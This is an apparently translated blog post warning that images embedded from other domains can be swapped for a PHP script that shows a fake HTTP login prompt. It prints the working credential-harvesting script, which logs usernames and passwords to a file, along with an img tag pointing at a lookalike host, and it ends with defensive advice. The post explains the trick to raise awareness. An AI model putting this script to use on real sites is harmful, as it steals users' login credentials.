Evil Phishing Pictures

That's right, people say: “Everything new is well forgotten old”

The possibility of embedding remote resources (for example, images from other sites) on the page of your site is a very bad practice. Which may at some point lead to quite serious consequences for the site. 10 years ago, I was surprised to read that this was possible. And now, 10 years have passed, nothing has changed, and it seems that it is unlikely that it will ever change.

Details under the cut

Theory and practice

1. A hacker is an evil user registers a domain similar to the spelling of the attacked domain.
2. Uploads to it a script with such content in PHP
')

<?php if (!isset($_SERVER['PHP_AUTH_USER'])) { $vulnsite = parse_url($_SERVER['REFERER']); //header('Content-Type: text/html; charset=windows-1251'); //header('WWW-Authenticate: Basic realm="'.ucfirst($vulnsite['host']).' DDoS-Filter: Enter your Login and Password"'); //header('HTTP/1.0 401 Unauthorized'); } else { $f = fopen('passes.txt', 'a'); fwrite($f, $_SERVER['PHP_AUTH_USER'].';'.$_SERVER['PHP_AUTH_PW']."\r\n"); fclose($f); } header("Content-type: image/jpeg"); $image = imagecreatefromjpeg('image.jpg'); imagejpeg($image); imagedestroy($image); exit(); //       image.jpg //          superphoto.jpg . ?> 

3. Writes an article and embeds a picture in a post:

<img src="http://exEmple.com/evilimage.php" alt="image"/>

4. If there is a moderation on the site, then sends the article to moderation.
5. For example, the article turned out to be good for him and it hits the main one.
6. An evil person sees his brainchild on the main page and removes comments in PHP code, so in response to a request for a picture from the post, any user in the browser has a window with authorization, where anything can be written, for example, that the site is fighting off DDoS attack, and asks to re-enter the login and password.
7. Not attentive user, does not read the domain name in the form of authorization and submit login and password.
8. An evil person gets your username and password, his goal is reached.

Ways to protect

I think there can be two sane methods:

• At the browser level: a ban on issuing an authorization window from another site
• At the level of site developers: Copying all remote resources to your hosting

PS

Habrahabr.ru is not an exception here on the main one there are posts with pictures from other resources. So you just need to keep this trick in your mind and always check to the letter the name of the domain that requires authorization.

And there is always the potential danger that while the picture is on the main one, the site from which this picture stretches, can only be hacked in order to replace the picture with a script.

Pps

I do not think this is a bug.
This is nothing more than a trick that is officially allowed by the HTTP protocol.